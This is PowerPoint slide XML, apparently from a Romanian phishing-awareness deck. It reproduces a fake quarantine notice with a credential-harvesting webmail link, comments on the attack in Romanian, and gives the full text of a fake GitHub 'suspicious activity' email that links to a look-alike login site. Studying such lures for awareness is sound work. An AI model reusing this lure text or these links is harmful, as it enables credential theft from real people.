                    <a:lnL w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>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14414" marR="14414" marT="7207" marB="7207">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="14414" marR="14414" marT="7207" marB="7207"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="160558">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>paul_gagniuc@acad.ro</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u="sng">
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>RE: PO 12440185- 12312301-for Supply and Installation of Metal Shelving Storage Rack (Heavy Duty Shelves</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:effectLst/>
                      </a:endParaRP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a:effectLst/>
                        </a:rPr>
                        <a:t>2/27/2024 1:05:05 a.m.</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endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="14414" marR="14414" marT="7207" marB="7207">
                    <a:lnL w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>⛔ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="0066CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>Release</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4504" marR="4504" marT="4504" marB="4504" anchor="ctr">
                    <a:lnL w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>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14414" marR="14414" marT="7207" marB="7207">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="14414" marR="14414" marT="7207" marB="7207"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="111935">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>paul_gagniuc@acad.ro</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u="sng">
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>FW: Re: FW: New PO - 2200000451983 - M S MODULAR RACK SYSTEMS PVT LTD</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r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2/27/2024 1:05:05 a.m.</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endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="14414" marR="14414" marT="7207" marB="7207">
                    <a:lnL w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>⛔ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="0066CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>Release</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </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4504" marR="4504" marT="4504" marB="4504" anchor="ctr">
                    <a:lnL w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>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tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="14414" marR="14414" marT="7207" marB="7207">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="14414" marR="14414" marT="7207" marB="7207"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="233492">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>paul_gagniuc@acad.ro</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r>
                        <a:rPr lang="en-US" sz="1000" u="sng">
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>PO 12440185- 12312301-for Supply and Installation of Metal Shelving Storage Rack (Heavy Duty Shelves) for UDC Pantry &amp; Stationary Centralized Store - 12312301</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:effectLst/>
                      </a:endParaRP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r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2/27/2024 1:05:05 a.m.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="4504" marR="4504" marT="4504" marB="4504"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tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1100">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="14414" marR="14414" marT="7207" marB="7207">
                    <a:lnL w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:solidFill>
                            <a:srgbClr val="0066CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>(more...6)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9009" marR="9009" marT="6006" marB="6006" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="C0C0C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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4352544" y="793557"/>
            <a:ext cx="7394448" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subject 	Incoming Message Failure Delivery Status Notification: returning message to paul_gagniuc@acad.ro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From 	paul_gagniuc@acad.ro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To 	paul_gagniuc@acad.ro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Date 	2024-02-27 11:05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5275182" y="6074542"/>
            <a:ext cx="5634586" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://dawlia2030.com/Webmail/75/Webmail/webmail.php?email=paul_gagniuc@acad.ro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5275182" y="6351541"/>
            <a:ext cx="6593730" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vrea sa vada cat de naiv este utilizatorul si cat de rapid raspunde. Este un atac in trepte.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="561563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321552" y="1943099"/>
            <a:ext cx="5394960"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6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="570280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URGENT: Activitate suspectă identificată pe contul dumneavoastră de GitHub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518160" y="2072210"/>
            <a:ext cx="5486400" cy="4473019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bună ziua!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vă contactăm în legătură cu contul dumneavoastră pe platforma GitHub. În urma monitorizării noastre continue a activităților, am identificat un comportament neobișnuit pe contul dumneavoastră care ar putea indica o amenințare gravă la securitatea contului și a datelor dumneavoastră.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pentru a vizualiza detaliile acestei activități și pentru a lua măsuri în combaterea acestor evenimente, vă rugăm să accesați cât mai curând link-ul de mai jos:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://githublogin.azurewebsites.net/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Este esențial să înțelegeți că întârzierea în acțiune ar putea avea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>consecințe extrem de grave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> pentru securitatea contului și a informațiilor dumneavoastră personale. Echipa noastră de securitate este mobilizată în prezent pentru a interveni prompt, dar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" u="sng">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>timpul este un factor crucial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vă asigurăm că echipa noastră de securitate lucrează îndeaproape pentru a investiga acest incident și pentru a preveni orice pierdere ulterioară. În scopul protejării contului și a informațiilor  dumneavoastră   personale, am luat următoarele măsuri imediate:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Am implementat măsuri suplimentare de securitate pentru contul  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dumneavoastră</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>  GitHub.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Am suspendat temporar anumite funcționalități ale contului pentru a preveni orice acces neautorizat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Vom iniția o investigație detaliată asupra acestei activități pentru a identifica sursa și a lua măsurile necesare pentru protejarea contului  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dumneavoastră.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="2009102"/>
            <a:ext cx="5114544" cy="4431983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vă recomandăm să verificați activitățile recente ale contului dumneavostră și să notificați imediat echipa noastră de suport dacă observați orice alt comportament suspect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pentru a vă proteja cât mai eficient, vă rugăm să răspundeți la acest e-mail sau să ne contactați la adresa de e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>support@github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> pentru a confirma dacă recunoașteți activitatea în cauză.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vă reamintim că </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GitHub nu va solicita niciodată </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>informații confidențiale, cum ar fi parole sau date bancare, prin e-mail sau telefon! Vă rugăm să fiți atenți la tentativele de phishing și să ne contactați imediat dacă aveți orice întrebări sau îngrijorări!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vă mulțumim pentru cooperare și pentru încrederea acordată! Ne angajăm să vă protejăm contul și să vă oferim o experiență sigură și de încredere pe platforma GitHub!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1100">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cu stimă,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
